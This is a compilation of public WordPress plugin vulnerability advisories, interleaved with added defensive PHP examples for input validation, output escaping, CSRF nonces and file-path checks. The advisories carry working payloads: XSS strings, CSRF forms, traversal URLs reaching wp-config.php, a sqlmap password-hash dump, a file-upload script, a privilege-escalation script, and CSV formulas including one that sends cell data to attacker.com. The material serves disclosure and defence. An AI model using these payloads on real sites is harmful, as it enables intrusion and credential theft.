===============================================================================================================
public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database.
# Proof Of Concept:
Suppose that you have a Contact Form: intercept the POST request and insert the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is accepted; the code reads `$_SERVER['HTTP_CLIENT_IP']` without validation, so the injected value is stored in the database as the client IP.
When the administrator clicks on the entry in the plugin's list, the XSS is triggered.
# Solution:
Upgrade Contact Form Entries to version 1.1.7
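The defensive counterpart to the issue above, written as an added example and not the plugin's own `get_ip()`: proxy headers such as `Client-IP` are only honoured when the request comes from a proxy the site operator controls, are accepted only if they parse as an IP address, and the value is still escaped when it is rendered. The function names, the trusted-proxy list and the `$_SERVER` arrays are constructed for the demonstration.

```php
<?php
// Added example, not the plugin's get_ip(). It resolves the client address
// without letting an unverified header value reach the database, and escapes it
// on output. The $_SERVER arrays at the bottom are constructed samples.

// REMOTE_ADDR is set by the web server and cannot be forged by the client.
// Client-IP / X-Forwarded-For are plain request headers, so they are honoured
// only when the TCP peer is a proxy we operate, and only if they parse as an IP.
function example_get_client_ip(array $server, array $trusted_proxies = array()) {
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    if (!in_array($remote, $trusted_proxies, true)) {
        return $remote; // direct connection: every header is attacker-controlled
    }
    foreach (array('HTTP_X_FORWARDED_FOR', 'HTTP_CLIENT_IP') as $header) {
        if (empty($server[$header])) {
            continue;
        }
        // X-Forwarded-For can be a chain "client, proxy1, proxy2"; take the first hop.
        $candidate = trim(explode(',', $server[$header])[0]);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
        // Malformed value (such as the advisory's <img> payload): ignore it.
    }
    return $remote;
}

// Output side: even a validated IP is escaped before it is put into HTML.
// Inside WordPress, esc_html() is the equivalent of this call.
function example_render_ip_cell($ip) {
    return '<td>' . htmlspecialchars($ip, ENT_QUOTES, 'UTF-8') . '</td>';
}

// Constructed requests. The first mirrors the advisory: a direct client sends a
// script payload in Client-IP. The second arrives through a trusted reverse proxy.
$direct = array(
    'REMOTE_ADDR'    => '203.0.113.7',
    'HTTP_CLIENT_IP' => '<img src=a onerror=alert(1)>',
);
$via_proxy = array(
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.9, 10.0.0.2',
);
$proxies = array('10.0.0.2');

echo example_render_ip_cell(example_get_client_ip($direct, $proxies)), "\n";
echo example_render_ip_cell(example_get_client_ip($via_proxy, $proxies)), "\n";
// Even if a bad value slipped past the first function, escaping alone keeps it
// from rendering as markup:
echo example_render_ip_cell($direct['HTTP_CLIENT_IP']), "\n";
```

The two layers are independent: validation keeps junk out of the `entries` table, escaping keeps whatever is in the table from executing in the administrator's browser. Either one alone would have stopped this particular payload; the second is the one that also covers data already stored before the fix.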
# Exploit Title: WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control
# Date: 2/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-fo...ck-tester/
# Version: 1.0.2
# Tested on: Windows 10
# CVE: CVE-2021-24247
1. Description:
The plugin settings are visible to all registered users in the dashboard.
A registered user can leave a payload in the plugin settings.
2. Proof of Concept:
- Register an account
- Navigate to the dashboard
- Go to CF7 Check Tester -> Settings
- Add a form
- Add a field to the form
- Put in a payload in either Field selector or Field value "><script>alert(1)</script>
- Save
Anyone who visits the settings page will execute the payload.
# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
# Date: 2022-02-07
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/contact-forms-builder/
# Version: 1.6.1
# Tested on: Windows 11
# CVE: N/A
1. Description:
This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1
Description
-----------
Plugin implements the following AJAX actions:
- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`
All of them call the function `contact_form_maker_ajax`. This function
dynamically loads a file defined in `$_GET['action']` or, if the former is
not set, `$_POST['action']`. Because of the way WordPress dispatches AJAX
actions, a user can put the plugin's file name in `$_GET['action']` and the
AJAX action in `$_POST['action']`.
Leveraging that, and the fact that no sanitization is performed on
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal, leading to a Local File Inclusion
vulnerability.
PoC
---
```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
<label>AJAX action:
<select name="action">
<option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
<option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
<option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
<option value="CFMShortcode">CFMShortcode</option>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```
# Exploit Title : Contact Form 7 to Database Extension Wordpress Plugin CSV Injection
# Date: 23-03-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: None
# Software Link: https://wordpress.org/plugins/contact-form-7-to-database-extension
# Version: 2.10.32
# CVE : CVE-2018-9035
# Category : webapps
Description
===========
Contact Form 7 to Database Extension is a WordPress plugin with more than 400,000 active installations. Development has been discontinued for a year. Version 2.10.32 (and possibly previous versions) is affected by a CSV Injection vulnerability.
Vulnerable part of code
=======================
File: contact-form-7-to-database-extension/ExportToCsvUtf8.php:135 prints value of column without checking if it contains a spreadsheet formula.
Impact
======
Arbitrary formulas can be injected into CSV/Excel files.
This can potentially lead to remote code execution at the client (DDE) or data leakage via maliciously injected hyperlinks.
Proof of Concept
============
In order to exploit this vulnerability, the attacker needs to insert an Excel formula into any of the available contact form fields. The value ends up in the log, and if a WordPress administrator exports that log as an Excel/CSV file, the file will contain the formula. When the administrator opens the file, the formula is evaluated.
Example:
=cmd|'/C calc.exe'!Z0
or
=HYPERLINK("http://attacker.com/leak?="&A1&A2, "Click to load more data!")
Solution
========
The plugin should escape fields starting with '=' when it exports data to CSV or Excel formats.
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276
1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
=======================================================================
title: SQL Injection
product: WordPress Community Events Plugin
vulnerable version: 1.3.5 (and probably below)
fixed version: 1.4
CVE number: CVE-2015-3313
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/community-events/
found: 2015-01-07
by: Hannes Trunde
mail: hannes.trunde@gmail.com
twitter: @hannestrunde
=======================================================================
Plugin description:
-------------------
"The purpose of this plugin is to allow users to create a schedule of upcoming
events and display events for the next 7 days in an AJAX-driven box or
displaying a full list of upcoming events."
Source: https://wordpress.org/plugins/community-events/
Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.
Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind SQL injection attack can be
performed within the search function to obtain sensitive information from the
database. To exploit this vulnerability, there has to be at least one planned
event on the calendar.
Proof of concept:
-----------------
The following HTTP request to the Community Events full schedule returns the
event(s) planned in the specified year:
===============================================================================
http://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1
===============================================================================
The following HTTP request returns a blank page, thus confirming the blind SQL
injection vulnerability:
===============================================================================
http://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1
===============================================================================
Obtaining users and password hashes with sqlmap may look as follows (--string
parameter has to contain (part of) the name of the event, enabling sqlmap to
differentiate between true and false statements):
================================================================================
sqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"
================================================================================
Contact timeline:
-----------------
2015-04-08: Contacting author via mail.
2015-04-09: Author replies and announces a fix within a week.
2015-04-12: Mail from author, stating that plugin has been updated.
2015-04-14: Posting information to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-18: Release of security advisory.
Solution:
---------
Update to the most recent plugin version.
Workaround:
-----------
See solution.
# Exploit Title: Wordpress Plugin Comments Import & Export < 2.0.4 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Bhushan B. Patil
# Software Link: https://wordpress.org/plugins/comments-import-export-woocommerce/
# Affected Version: 2.0.4 and before
# Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE: CVE-2018-11526
# 1. Application Description:
# Comments Import Export Plugin helps you to easily export and import Article and Product Comments in your store.
# 2. Technical Description:
# WordPress Comments Import & Export plugin version 2.0.4 and before is affected by a Remote Command Execution
# vulnerability via CSV Injection. A public user can inject a formula into form fields; when a user with
# higher privileges exports the form data to CSV and opens the file on their machine, the command is executed.
# 3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When a high-privileged user logs into the application, exports the form data to CSV and opens the file,
the formula is executed and the calculator pops up on their machine.
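Both CSV injection advisories above (Contact Form 7 to Database Extension and Comments Import & Export) end with the same fix: escape cells that a spreadsheet would read as a formula. The block below is an added example, not either plugin's export code; it applies the single-quote prefix that Excel and LibreOffice treat as "this cell is text" and feeds the result through `fputcsv()`. The sample rows are constructed and include the payloads quoted in the two advisories.

```php
<?php
// Added example, not the plugins' own export code. It neutralises spreadsheet
// formulas in exported cells; the rows at the bottom are constructed and include
// the payloads quoted in the two advisories.

// Spreadsheets treat a cell as a formula when it starts with =, +, -, or @.
// Leading tab/CR are included because some importers strip them before parsing.
function csv_cell_is_formula($value) {
    return strspn((string) $value, "=+-@\t\r") > 0;
}

// Prefixing with a single quote forces Excel and LibreOffice to keep the cell
// as text; the quote itself is not displayed in the sheet.
function csv_escape_cell($value) {
    $value = (string) $value;
    return csv_cell_is_formula($value) ? "'" . $value : $value;
}

// Build CSV text from rows, escaping every cell on the way out. fputcsv() adds
// the quoting needed for commas, double quotes and newlines.
function export_rows_to_csv(array $rows) {
    $fh = fopen('php://temp', 'r+');
    foreach ($rows as $row) {
        fputcsv($fh, array_map('csv_escape_cell', $row));
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed export of a contact-form log with hostile submissions mixed in.
$rows = array(
    array('name', 'email', 'message'),
    array('Alice', 'alice@example.com', 'Hello'),
    array("=cmd|'/C calc.exe'!Z0", 'bob@example.com', "@SUM(1+1)*cmd|' /C calc'!A0"),
    array('Carol', 'carol@example.com', '=HYPERLINK("http://attacker.com/leak?="&A1&A2, "Click to load more data!")'),
    array('-5', '+1', 'negative numbers are escaped too; restore them on import if needed'),
);
echo export_rows_to_csv($rows);
```

The trade-off is visible in the last row: a cell that legitimately starts with `-` or `+` (a negative number, a phone prefix) is also turned into text. That is the safe default for a free-text export; a column known to be numeric can skip the escape after it has been validated as a number.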
source: https://www.securityfocus.com/bid/57771/info
The CommentLuv plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CommentLuv versions 2.92.3 and prior are vulnerable.
<form action="http://www.example.com/wp-admin/admin-ajax.php" method="post" name="askform">
<input type="hidden" name="action" value="cl_ajax" />
<input type="hidden" name="do" value="fetch" />
<input type="hidden" name="url" value="1" />
<input type="hidden" name="_ajax_nonce" value='<script>alert(document.cookie);</script>'/>
<input type="submit" id="btn">
</form>
source: https://www.securityfocus.com/bid/51241/info
The Comment Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=
# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated)
# Date: 10.8.2020.
# Exploit Author: n1x_ [MS-WEB]
# Software Homepage: https://wordpress.org/plugins/wp-colorbox/
# Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip
# Product Version: 1.1.1
[Description]
# WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library.
# Due to improper input sanitization of the "hyperlink" field of the plugin shortcode, version v1.1.1 (and possibly previous versions) is affected by a stored XSS vulnerability.
[Proof of Concept]
# 1. Log in as a user with privileges to write and publish posts
# 2. Inject code into the "hyperlink" field of the plugin shortcode and publish the post
# 3. The code is stored in the post
[Example payloads]
# Example payload 1: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert(document.cookie)</script>"]
# Example payload 2: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert('sampletext')</script>"]
[Response]
...
<a class="wp-colorbox-youtube" href="http://www.youtube.com/embed/example"><script>alert('sampletext')</script></a>
...
# Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File Disclosure Download
# Google Dork: inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=
# Date: 02/12/2014
# Exploit Author: QK14 Team
# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/
# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/
# Version: 1.0.11
# http://wordpressa.quantika14.com/repository/index.php?id=14
Description:
This plugin is vulnerable to File Disclosure Download.
Thanks to this vulnerability, a user can download the configuration file config.php and extract the database access credentials from it.
PoC:
localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
source: https://www.securityfocus.com/bid/67469/info
The cnhk-slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
<?php
// Uploads a local file (file.php) through the plugin's uploadify.php handler.
$uploadfile = "file.php";
$ch = curl_init("http://localhost/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the pre-PHP-5.5 upload syntax; CURLFile is required on newer PHP.
$upload = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array('slideshow' => $upload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
* Exploit Title: CMS Tree Page View [CSRF, Privilege Escalation]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://eskapism.se/
* Software Link: https://wordpress.org/plugins/cms-tree-page-view
* Version: 1.4
* Tested on: WordPress 4.8.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements the AJAX action `cms_tpv_add_page`, which calls back the
function `cms_tpv_add_page`. The latter does not implement any anti-CSRF
controls or security checks.
Leveraging a CSRF attack an attacker could perform a Persistent XSS
attack if the victim has administrative rights (see PoC).
The AJAX action is a privileged one so it's only available for
registered users. Even so it doesn't implement any capabilities checks
so it's available to all users no matter the access level. This could
allow any registered user to create arbitrary posts no matter the access
level.
PoC
---
### CSRF -> Persistent XSS
In this PoC we exploit the `$_POST["page_titles"]` param to perform a
Persistent XSS attack.
```html
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="cms_tpv_add_page">
<input type="text" name="type" value="after">
<input type="text" name="pageID" value="1">
<input type="text" name="post_type" value="page">
<input type="text" name="page_title" value="<script>alert(2)</script>">
<button type="submit" value="Submit">Submit</button>
</form>
```
### Create Arbitrary Posts
In this PoC we use a user with subscriber access to create arbitrary
pages. The `post_type` is user defined so in the same manner we could
create any post type.
```php
#!/usr/bin/env php
<?php
/*******************************************************************************
* CMS Tree Page View [Privilege Escalation]
*
* To install deps run `composer require wordfence/exkit`.
*
* @author Panagiotis Vagenas <pan.vagenas@gmail.com>
* @date 2017-08-09
******************************************************************************/
require_once __DIR__ . '/vendor/autoload.php';
use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\WPAuthentication;
Config::get( 'url.base', null, true, 'Enter the site URL' )
|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
Cli::writeInfo( 'Logging in as subscriber...' );
WPAuthentication::logInAsUserRole( $s,
WPAuthentication::USER_ROLE_SUBSCRIBER );
Cli::writeInfo( 'Sending payload...' );
$postData = [
'action' => 'cms_tpv_add_page',
'type' => 'after',
'pageID' => '1',
'post_type' => 'page',
'page_title' => date('Y-m-d H:i:s'),
];
$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
if(!$r->success || $r->body == '0'){
ExitCodes::exitWithFailed('Failed to retrieve a valid response');
}
ExitCodes::exitWithSuccess('Exploitation successful');
```
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-23**: Vendor notified by email
3. **2018-01-06**: Patch released
source: https://www.securityfocus.com/bid/55241/info
The Cloudsafe365 plugin for WordPress is prone to a file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process. This may aid in further attacks.
http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
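Three of the advisories above (Contact Form Builder's CSRF to LFI, the Google MP3 Player `direct_download.php` and the Cloudsafe365 `cs365_edit.php` file disclosures) share one root cause: a request parameter becomes a file path. The block below is an added example, not code from any of those plugins, and shows the two patterns that close this class of bug: an allowlist for files that are `include()`d, and a canonical-path containment check for files that are served. The directory, file names and action map are constructed for the demonstration.

```php
<?php
// Added example, not code from Contact Form Builder, Google MP3 Player or
// Cloudsafe365. Two patterns for request-controlled file names: an allowlist for
// files that get include()d, and a canonical-path check for files that get
// served. The directory and file names below are constructed for the demo.

// (a) Never derive an include path from the request. Map the action name to a
//     fixed file through an allowlist; anything else is refused outright.
function example_resolve_action_file($action, $base_dir) {
    $allowed = array(
        'ContactFormMakerPreview'   => 'preview.php',
        'ContactFormmakerwdcaptcha' => 'captcha.php',
        'CFMShortcode'              => 'shortcode.php',
    );
    if (!is_string($action) || !array_key_exists($action, $allowed)) {
        return null;
    }
    return rtrim($base_dir, '/\\') . DIRECTORY_SEPARATOR . $allowed[$action];
}

// (b) For downloads, require a bare file name, then canonicalise with realpath()
//     and confirm the result still lies inside the base directory. realpath()
//     resolves "..", symlinks and returns false for files that do not exist, so
//     the containment check is made on the path the OS would actually open.
function example_resolve_download($requested, $base_dir) {
    $base = realpath($base_dir);
    if ($base === false || !is_string($requested) || basename($requested) !== $requested) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Demo against a throw-away directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'mp3demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'song.mp3', 'not audio');

$tests = array(
    'song.mp3',                   // legitimate request
    '../../../wp-config.php',     // traversal from the advisories
    'missing.mp3',                // does not exist
);
foreach ($tests as $t) {
    $r = example_resolve_download($t, $dir);
    echo str_pad($t, 26), ' => ', $r === null ? 'refused' : 'serve ' . basename($r), "\n";
}
foreach (array('CFMShortcode', '/../../../../../../index') as $a) {
    $r = example_resolve_action_file($a, $dir);
    echo str_pad($a, 26), ' => ', $r === null ? 'refused' : 'include ' . basename($r), "\n";
}

unlink($dir . DIRECTORY_SEPARATOR . 'song.mp3');
rmdir($dir);
```

In the Contact Form Builder case the underlying mistake is reusing `$_GET['action']`, which `admin-ajax.php` already consumes as the dispatch key, as a file name; pattern (a) removes that coupling entirely because the request can only select from the map, never name a path. Pattern (b) is what `direct_download.php` and `cs365_edit.php` needed: `basename()` rejects any separator, and the `realpath()` prefix test catches the cases `basename()` cannot see, such as a symlink inside the directory pointing at `wp-config.php`.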
source: https://www.securityfocus.com/bid/50778/info
ClickDesk Live Support plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ClickDesk Live Support 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss]
================================================================
CSRF/Stored XSS Vulnerability in ClickBank Ads V 1.7 Plugin
================================================================
Overview
========
* Title :CSRF and Stored XSS Vulnerability in ClickBank Ads Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/clickbank-ads-clickbank-widget/
* Severity: HIGH
* Version Affected: Version 1.7 and mostly prior to it
* Version Tested : Version 1.7
* version patched:
Description
===========
Vulnerable Parameter
--------------------
* Title:
About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.
Vulnerability Class
===================
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
Steps to Reproduce: (POC)
=========================
After installing the plugin
1. Goto Dashboard --> Setting --> ClickBank Ads --> Title
2. Insert the payload ## "><script>+-+-1-+-+alert(document.cookie)</script> ## into the vulnerable parameter mentioned above, save the settings and see the XSS in action
3. Visit the ClickBank Ads settings page of this plugin at any later time and you can see the script executing, as it is stored.
The plugin does not use any nonces, so the same settings can be changed through a CSRF attack; the PoC code for that is below.
CSRF POC Code
=============
<html>
<body>
<form action="http://127.0.0.1/wp/wp-admin/options-general.php?page=clickbank-ads-clickbank-widget/clickbank-ads.php" method="POST">
<input type="hidden" name="cbwec[title]" value="">>><script>+-+-1-+-+alert(document.cookie)</script>" />
<input type="hidden" name="cbwec[name]" value="kaustubh" />
<input type="hidden" name="cbwec[keywordbytitle2]" value="Title" />
<input type="hidden" name="cbwec[keywords]" value="" />
<input type="hidden" name="cbwec[adformat]" value="1" />
<input type="hidden" name="cbwec[width2]" value="100%" />
<input type="hidden" name="cbwec[width]" value="100%" />
<input type="hidden" name="cbwec[height]2" value="220" />
<input type="hidden" name="cbwec[height]" value="220" />
<input type="hidden" name="cbwec[pos]" value="Top" />
<input type="hidden" name="cbwec[bordstyle]" value="1" />
<input type="hidden" name="cbwec[bordcolor]" value="CCCCCC" />
<input type="hidden" name="cbwec[linkcolor]" value="0000FF" />
<input type="hidden" name="cbwec[runplugin]" value="1" />
<input type="hidden" name="cbwec[homepage]" value="1" />
<input type="hidden" name="cbwec[onlypost]" value="1" />
<input type="hidden" name="cbwec_submit" value="Save »" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh (at) me (dot) com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
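The CSRF advisories on this page (Contact Form Generator's create/update/delete handlers, CMS Tree Page View's `cms_tpv_add_page` AJAX action, and the ClickBank Ads settings form just above) all come down to the same two missing checks: a nonce that a cross-site form cannot supply, and a capability check that a low-privileged account cannot pass; ClickBank Ads and CMS Tree Page View additionally store the posted value unsanitised and echo it unescaped. The block below is an added example, not code from any of those plugins, showing what each handler type looks like with the checks in place. Names prefixed `example_` (functions, option name, nonce actions, the `wp_example_items` table) are hypothetical; the WordPress API calls are real, so the file is meant to be loaded as a plugin rather than run from the command line.

```php
<?php
// Added example: not code from Contact Form Generator, CMS Tree Page View or
// ClickBank Ads. Every name prefixed "example_" is hypothetical; the WordPress
// functions called are real. Load as a plugin; there is no CLI entry point.

// 1. Settings page (ClickBank Ads pattern). Rendering emits the nonce field;
//    esc_attr() keeps a stored "><script> string inert inside the attribute.
function example_render_settings_form() {
    $opts  = get_option('example_settings', array());
    $title = isset($opts['title']) ? $opts['title'] : '';
    echo '<form method="post">';
    wp_nonce_field('example_save_settings', 'example_nonce');
    echo '<input type="text" name="example[title]" value="' . esc_attr($title) . '" />';
    echo '<input type="submit" name="example_submit" value="Save" />';
    echo '</form>';
}

// Saving: capability first, then nonce, then sanitise every field before it is
// stored. check_admin_referer() calls wp_die() when the nonce is missing or
// stale, which is exactly what happens to the CSRF PoC forms on this page.
function example_handle_settings_save() {
    if (!isset($_POST['example_submit'])) {
        return;
    }
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges', 403);
    }
    check_admin_referer('example_save_settings', 'example_nonce');

    $in  = isset($_POST['example']) && is_array($_POST['example']) ? wp_unslash($_POST['example']) : array();
    $out = array(
        'title'  => sanitize_text_field(isset($in['title']) ? $in['title'] : ''),
        'height' => absint(isset($in['height']) ? $in['height'] : 0),
    );
    update_option('example_settings', $out);
}
add_action('admin_init', 'example_handle_settings_save');

// 2. Bulk delete (Contact Form Generator pattern): same two checks, and the
//    posted ids are forced to integers before any row is touched.
function example_handle_bulk_delete() {
    if (!isset($_POST['task']) || $_POST['task'] !== 'delete') {
        return;
    }
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges', 403);
    }
    check_admin_referer('example_bulk_delete', 'example_nonce');
    global $wpdb;
    $ids = isset($_POST['ids']) ? array_filter(array_map('absint', (array) $_POST['ids'])) : array();
    foreach ($ids as $id) {
        // $wpdb->delete() builds a prepared DELETE; %d pins the id to an integer.
        $wpdb->delete($wpdb->prefix . 'example_items', array('id' => $id), array('%d'));
    }
}
add_action('admin_init', 'example_handle_bulk_delete');

// 3. admin-ajax action (CMS Tree Page View pattern). A wp_ajax_ hook already
//    requires a login, but every role gets through it; the capability check is
//    what keeps subscribers out and the nonce check is what defeats CSRF.
function example_ajax_add_page() {
    check_ajax_referer('example_add_page', 'nonce'); // replies "-1" and exits on failure
    if (!current_user_can('edit_pages')) {
        wp_send_json_error('forbidden', 403);
    }
    $title   = sanitize_text_field(wp_unslash(isset($_POST['page_title']) ? $_POST['page_title'] : ''));
    $post_id = wp_insert_post(array(
        'post_type'   => 'page',
        'post_title'  => $title,
        'post_status' => 'draft',
    ), true);
    if (is_wp_error($post_id)) {
        wp_send_json_error($post_id->get_error_message());
    }
    wp_send_json_success(array('id' => $post_id));
}
add_action('wp_ajax_example_add_page', 'example_ajax_add_page');
// No wp_ajax_nopriv_ counterpart: unauthenticated callers never reach the function.
```

The order inside each handler matters for reviewing other plugins: the capability check answers "may this user do this at all", the nonce answers "did this user actually intend this request", and neither replaces the other. A nonce alone would still let the subscriber in the CMS Tree Page View advisory create pages; a capability check alone would still let the ClickBank Ads form be submitted from an attacker's page in an administrator's browser.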
# Exploit Title: Wordpress church_admin Stored XSS
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/church-admin/
# Version: 0.800
# OSVDB ID : http://www.osvdb.org/show/osvdb/121304
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7999
# Category: webapps
1. Description
On the registration form the address field is not validated before returning it to the user.
Visiting the Directory page will show the confirm window.
2. Proof of Concept
